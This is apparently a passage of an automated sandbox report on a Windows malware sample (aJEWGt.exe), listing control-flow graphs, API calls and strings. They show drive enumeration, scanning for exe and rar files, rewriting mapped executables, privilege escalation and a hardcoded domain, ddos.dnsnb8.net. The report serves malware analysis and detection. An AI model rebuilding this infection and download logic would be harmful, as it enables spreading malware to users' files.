ae6519-ae651c 311->322 312->311 313->307 328 ae6535-ae6537 321->328 329 ae64c2 321->329 323 ae651d-ae651e 322->323 324 ae6583-ae6587 322->324 327 ae6522-ae6533 323->327 326 ae6588-ae658b 324->326 330 ae658d-ae658f 326->330 331 ae65a1-ae65a3 326->331 327->328 332 ae659a 328->332 333 ae6539 328->333 334 ae64f8 329->334 335 ae64c5-ae64cd 329->335 336 ae6591-ae6593 330->336 339 ae659b-ae659d 332->339 337 ae653b-ae6541 333->337 338 ae65b4 333->338 342 ae656c-ae656f 334->342 343 ae64fa-ae64fe 334->343 340 ae64cf-ae64d4 335->340 341 ae6542-ae6545 335->341 336->339 346 ae6595 336->346 337->341 351 ae65be-ae6608 338->351 339->336 347 ae659f 339->347 348 ae64d6-ae64d9 340->348 349 ae6517-ae6518 340->349 350 ae654d-ae6550 341->350 344 ae6572 342->344 343->344 345 ae6500 343->345 352 ae6573-ae6576 344->352 345->327 353 ae6502 345->353 346->332 347->326 348->350 354 ae64db-ae64f5 348->354 349->322 350->351 355 ae6552-ae6556 350->355 356 ae6578-ae657f 352->356 353->352 357 ae6504-ae6513 353->357 354->334 355->356 358 ae6558-ae6569 355->358 356->324 357->328 360 ae6515 357->360 358->342 360->349
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00AE60BE
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 2320c878b0a2674f4b63457098cf697862efbcd4aa7e769d08dc81d89fcae542
                            • Instruction ID: befdb36642aafb28c2f537b10696b4a4347a663c07ad263f78c09718cb2fd121
                            • Opcode Fuzzy Hash: 2320c878b0a2674f4b63457098cf697862efbcd4aa7e769d08dc81d89fcae542
                            • Instruction Fuzzy Hash: 181245B26087C58FDB328F25CC55BEA3BB0EF22350F1849ADD9898B193D774A901C761

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 362 ae2b8c-ae2bc6 memset GetLogicalDriveStringsA 363 ae2bc8-ae2bcc 362->363 364 ae2c09-ae2c28 WaitForMultipleObjects 362->364 367 ae2bce-ae2bd0 363->367 368 ae2bfa-ae2c07 lstrlen 363->368 365 ae2c3c-ae2c45 364->365 366 ae2c2a-ae2c3a CreateThread 364->366 366->365 367->368 369 ae2bd2-ae2bdc GetDriveTypeA 367->369 368->363 368->364 369->368 370 ae2bde-ae2be1 369->370 370->368 371 ae2be3-ae2bf6 CreateThread 370->371 371->368
                            APIs
                            • memset.MSVCRT ref: 00AE2BA6
                            • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00AE2BB4
                            • GetDriveTypeA.KERNEL32(?), ref: 00AE2BD3
                            • CreateThread.KERNEL32(00000000,00000000,00AE2B7D,?,00000000,00000000), ref: 00AE2BEE
                            • lstrlen.KERNEL32(?), ref: 00AE2BFB
                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AE2C16
                            • CreateThread.KERNEL32(00000000,00000000,00AE2845,00000000,00000000,00000000), ref: 00AE2C3A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                            • String ID:
                            • API String ID: 1073171358-0
                            • Opcode ID: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
                            • Instruction ID: 5c7f5fa6c7ad3377ff9feec38fd6f4694aab5d2a9f2356503f26d261d9a6ed46
                            • Opcode Fuzzy Hash: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
                            • Instruction Fuzzy Hash: 5321D2B28001CCAFEB20EFA5AC88EEE7B6DFB44344B240529F842D3151D7248E07CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 16 ae1e6e-ae1e95 call ae2d60 19 ae1e9c-ae1eaa call ae1df6 16->19 20 ae1e97 call ae1d8a 16->20 24 ae2332 19->24 25 ae1eb0-ae1ed9 SetFileAttributesA CreateFileA 19->25 20->19 27 ae2338-ae233b 24->27 25->24 26 ae1edf-ae1f28 call ae1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 36 ae1f2e-ae1f39 26->36 28 ae233d-ae2340 UnmapViewOfFile 27->28 29 ae2346-ae2349 27->29 28->29 31 ae234b-ae234e FindCloseChangeNotification 29->31 32 ae2350-ae2354 29->32 31->32 34 ae2356-ae235b FindCloseChangeNotification 32->34 35 ae2391-ae239a call ae2d9b 32->35 34->35 36->24 37 ae1f3f-ae1f56 36->37 37->24 39 ae1f5c-ae1f64 37->39 39->24 41 ae1f6a-ae1f70 39->41 41->24 42 ae1f76-ae1f87 call ae1c81 41->42 42->24 45 ae1f8d-ae1fa7 call ae185b call ae1c81 42->45 45->24 50 ae1fad-ae1fb4 45->50 51 ae1fb6-ae1fc5 call ae1af9 50->51 52 ae2024-ae2045 50->52 51->52 60 ae1fc7-ae1fd2 51->60 52->24 53 ae204b-ae204e 52->53 55 ae2070-ae20f4 call ae1af9 * 2 call ae1c68 * 2 memset * 2 53->55 56 ae2050-ae2053 53->56 78 ae20f5-ae20fe 55->78 58 ae2056-ae205a 56->58 58->55 63 ae205c-ae2061 58->63 60->24 62 ae1fd8-ae1fe7 60->62 65 ae1fef-ae2006 call ae1af9 62->65 66 ae1fe9-ae1fec 62->66 63->24 67 ae2067-ae206e 63->67 73 ae2008-ae200e call ae1c68 65->73 74 ae2013-ae201e FlushViewOfFile 65->74 66->65 67->58 73->74 74->52 79 ae2130-ae2139 78->79 80 ae2100-ae2114 78->80 83 ae213c-ae2142 79->83 81 ae212d-ae212e 80->81 82 ae2116-ae212a 80->82 81->78 82->81 84 ae215c 83->84 85 ae2144-ae2150 83->85 86 ae215f-ae2162 84->86 87 ae2157-ae215a 85->87 88 ae2152-ae2154 85->88 89 ae2164-ae2171 86->89 90 ae2181-ae2184 86->90 87->83 88->87 91 ae232a-ae232d 89->91 92 ae2177-ae217e 89->92 93 ae218d-ae21ba call ae1c68 90->93 94 ae2186 90->94 91->86 92->90 97 ae21bc-ae21d0 call ae1c68 93->97 98 ae21d3-ae220b call ae1c81 call ae1c68 93->98 94->93 97->98 105 ae220d-ae2218 call ae1c68 98->105 106 ae221b-ae221e 98->106 105->106 108 ae2226-ae231a memcpy UnmapViewOfFile CloseHandle call ae1b8a call ae185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call ae1915 106->108 109 ae2220-ae2223 106->109 116 ae231f-ae2328 CloseHandle 108->116 109->108 116->27
                            APIs
                            • SetFileAttributesA.KERNEL32(?,00000080,?,00AE32B0,00000164,00AE2986,?), ref: 00AE1EB9
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00AE1ECD
                            • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00AE1EF3
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00AE1F07
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00AE1F1D
                            • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00AE201E
                            • memset.MSVCRT ref: 00AE20D8
                            • memset.MSVCRT ref: 00AE20EA
                            • memcpy.MSVCRT ref: 00AE222D
                            • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2238
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE224A
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22C6
                            • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22CB
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22DD
                            • WriteFile.KERNEL32(000000FF,00AE4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22F7
                            • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE230D
                            • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2322
                            • UnmapViewOfFile.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2340
                            • FindCloseChangeNotification.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE234E
                            • FindCloseChangeNotification.KERNEL32(000000FF,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2359
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                            • String ID:
                            • API String ID: 3349749541-0
                            • Opcode ID: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
                            • Instruction ID: 192fe4ab05526d6434d55aca0447c1b400ed0a6c7f411602258ddaf383850f7c
                            • Opcode Fuzzy Hash: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
                            • Instruction Fuzzy Hash: D2F17D71900299EFCF20DFA5DD85AADBBB9FF08314F104529E519AB6A1D730AE81CF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 117 ae1973-ae199a PathFileExistsA 118 ae1ac7-ae1acc 117->118 119 ae19a0-ae19aa 117->119 120 ae1ace 118->120 121 ae1ad0-ae1ad5 118->121 122 ae19af-ae19c2 CreateFileA 119->122 120->121 123 ae1ad7-ae1ad9 121->123 124 ae1af0-ae1af6 121->124 125 ae1a28-ae1a36 GetFileSize 122->125 126 ae19c4-ae19d3 Sleep 122->126 123->124 127 ae1a38-ae1a3b 125->127 128 ae1a87-ae1a8b 125->128 126->122 129 ae19d5-ae1a0b call ae185b wsprintfA CopyFileA 126->129 127->128 130 ae1a3d-ae1a51 VirtualAlloc 127->130 131 ae1a8d-ae1a90 FindCloseChangeNotification 128->131 132 ae1a96-ae1a9a 128->132 129->125 140 ae1a0d-ae1a26 CreateFileA 129->140 130->128 135 ae1a53-ae1a57 130->135 131->132 136 ae1a9c 132->136 137 ae1aad-ae1ab1 132->137 141 ae1a59-ae1a6d ReadFile 135->141 142 ae1a80 135->142 143 ae1aa0-ae1aa7 DeleteFileA 136->143 138 ae1adb-ae1ae0 137->138 139 ae1ab3-ae1ab6 137->139 146 ae1ae7-ae1aec 138->146 147 ae1ae2-ae1ae5 138->147 139->118 144 ae1ab8-ae1ac1 VirtualFree 139->144 140->125 145 ae1a9e 140->145 141->128 148 ae1a6f-ae1a7e 141->148 142->128 143->137 144->118 145->143 146->124 149 ae1aee 146->149 147->146 148->141 148->142 149->124
                            APIs
                            • PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE1992
                            • CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
                            • Sleep.KERNEL32(00000064), ref: 00AE19C6
                            • wsprintfA.USER32 ref: 00AE19EC
                            • CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
                            • GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
                            • ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00AE1A90
                            • DeleteFileA.KERNEL32(?), ref: 00AE1AA7
                            • VirtualFree.KERNEL32(00AE4E60,00000000,00008000), ref: 00AE1AC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                            • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                            • API String ID: 2523042076-2136573946
                            • Opcode ID: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
                            • Instruction ID: 9736ec814f0ba57ab24b1904f4f9fef0c096a11739bdbe126b3136f4c745cc5b
                            • Opcode Fuzzy Hash: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
                            • Instruction Fuzzy Hash: 04512A719012A9AFCF20DF9ADDC8ABEBBB9EB04394F104579E515A7190D3709E41CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 ae28b8-ae28ff memset wsprintfA 151 ae29db-ae29df 150->151 152 ae2905-ae290d 150->152 152->151 153 ae2913-ae2919 152->153 154 ae291b-ae294c memset wsprintfA call ae29e2 153->154 155 ae2956-ae2965 strrchr 153->155 158 ae2951 154->158 155->151 157 ae2967-ae2978 lstrcmpiA 155->157 159 ae297a-ae2981 call ae1e6e 157->159 160 ae2988-ae2992 lstrcmpiA 157->160 158->151 163 ae2986 159->163 160->151 161 ae2994-ae299b 160->161 164 ae29ad-ae29c9 strstr 161->164 165 ae299d-ae29a3 161->165 163->151 167 ae29cb-ae29d1 call ae239d 164->167 168 ae29d3-ae29d6 call ae2692 164->168 165->164 166 ae29a5-ae29a7 lstrcpy 165->166 166->164 167->151 168->151
                            APIs
                            • memset.MSVCRT ref: 00AE28D3
                            • wsprintfA.USER32 ref: 00AE28F7
                            • memset.MSVCRT ref: 00AE2925
                            • wsprintfA.USER32 ref: 00AE2940
                              • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A02
                              • Part of subcall function 00AE29E2: wsprintfA.USER32 ref: 00AE2A1A
                              • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A44
                              • Part of subcall function 00AE29E2: lstrlen.KERNEL32(?), ref: 00AE2A54
                              • Part of subcall function 00AE29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00AE2A6C
                              • Part of subcall function 00AE29E2: strrchr.MSVCRT ref: 00AE2A7C
                              • Part of subcall function 00AE29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00AE2A9F
                              • Part of subcall function 00AE29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00AE2AAE
                              • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2AC6
                              • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2ADA
                              • Part of subcall function 00AE29E2: FindFirstFileA.KERNEL32(?,?), ref: 00AE2AEF
                              • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2B13
                            • strrchr.MSVCRT ref: 00AE2959
                            • lstrcmpiA.KERNEL32(00000001,exe), ref: 00AE2974
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                            • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                            • API String ID: 3004273771-898104377
                            • Opcode ID: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
                            • Instruction ID: d0c4d69c88845e2481cd0b2f6993d9b0ce943976e5bb634b777aea5b5a69b44b
                            • Opcode Fuzzy Hash: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
                            • Instruction Fuzzy Hash: E331D97294039D7BDF20E7A6DC89FDA776CAF14310F040852F585A7082E6B4DAC58BA0

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00AE164F
                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00AE165B
                            • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\aJEWGt.exe,00000104), ref: 00AE166E
                            • CreateThread.KERNEL32(00000000,00000000,00AE1099,00000000,00000000,00000000), ref: 00AE16AC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00AE16BD
                              • Part of subcall function 00AE139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE13BC
                              • Part of subcall function 00AE139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
                              • Part of subcall function 00AE139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448
                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE16E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\aJEWGt.exe$C:\Windows\system32$Documents and Settings
                            • API String ID: 123563730-3443616189
                            • Opcode ID: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
                            • Instruction ID: 780cb21829624f6e00962e6189ee4f860cca1e86c8b96ab84bfbf5f04d849007
                            • Opcode Fuzzy Hash: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
                            • Instruction Fuzzy Hash: EA11B6725012F4BBDF21A7E79DCDEEB3E6DEB49761F000051F2099A0A0D6708A41CBB1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 205 ae1000-ae1023 CreateFileA 206 ae1025-ae1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 ae1092-ae1096 205->207 208 ae107b-ae1085 206->208 209 ae1057-ae105f 206->209 212 ae108d-ae1091 CloseHandle 208->212 213 ae1087-ae108b CloseHandle 208->213 210 ae1074-ae1075 UnmapViewOfFile 209->210 211 ae1061-ae106e call ae17d0 209->211 210->208 211->210 212->207 213->212
                            APIs
                            • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1018
                            • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1029
                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00AE1038
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE104B
                            • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1075
                            • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108B
                            • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1223616889-3273462101
                            • Opcode ID: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
                            • Instruction ID: b8bc68bff389a1a0792074d3cdce193807fc4ef26d9c59ca5d5831514bb55f65
                            • Opcode Fuzzy Hash: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
                            • Instruction Fuzzy Hash: 4D01487250039DBFE730AFA19CCCE2B7BACDB447A9F004529F645A7590D6705E458B60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 372 ae2c48-ae2c75 memset call ae1973 375 ae2c77-ae2c7f 372->375 376 ae2cb2-ae2cb9 372->376 377 ae2c8f-ae2cac CreateThread WaitForMultipleObjects 375->377 378 ae2c81-ae2c8b 375->378 379 ae2cbb-ae2cc2 VirtualFree 376->379 380 ae2cc8-ae2ccc 376->380 377->376 378->377 379->380
                            APIs
                            • memset.MSVCRT ref: 00AE2C57
                              • Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE1992
                              • Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
                              • Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
                              • Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
                              • Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
                              • Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
                              • Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
                              • Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
                              • Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
                            • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00AE2C99
                            • WaitForMultipleObjects.KERNEL32(00000001,00AE16BA,00000001,000000FF,?,00AE16BA,00000000), ref: 00AE2CAC
                            • VirtualFree.KERNEL32(00FE0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\aJEWGt.exe,00AE4E5C,00AE4E60,?,00AE16BA,00000000), ref: 00AE2CC2
                            Strings
                            • C:\Users\user\AppData\Local\Temp\aJEWGt.exe, xrefs: 00AE2C69
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                            • String ID: C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                            • API String ID: 2042498389-1418763937
                            • Opcode ID: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
                            • Instruction ID: aa930a364c904a30a3ce9088dc5f09fde5d70020b2aa5010e8ba6dd559773aab
                            • Opcode Fuzzy Hash: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
                            • Instruction Fuzzy Hash: EB017C726412A47AE614EBE6DC4EFEB7EADEF45B60F104520F5059A1C1D6A09A00C7A0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 381 ae14e1-ae14fb 382 ae14fd-ae1510 GetModuleHandleA 381->382 383 ae1541-ae1547 381->383 384 ae151a-ae1535 VirtualQuery 382->384 385 ae1512-ae1518 382->385 386 ae1549-ae154c 383->386 387 ae1573-ae1574 call ae1638 383->387 388 ae153b 384->388 389 ae1537-ae1539 384->389 385->383 390 ae154e-ae1555 386->390 391 ae1569-ae1570 386->391 393 ae1579-ae157a ExitProcess 387->393 388->383 389->383 389->388 390->391 394 ae1557-ae1566 call ae1af9 390->394 394->391
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00AE1504
                            • VirtualQuery.KERNEL32(00AE14E1,?,0000001C), ref: 00AE1525
                            • ExitProcess.KERNEL32 ref: 00AE157A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
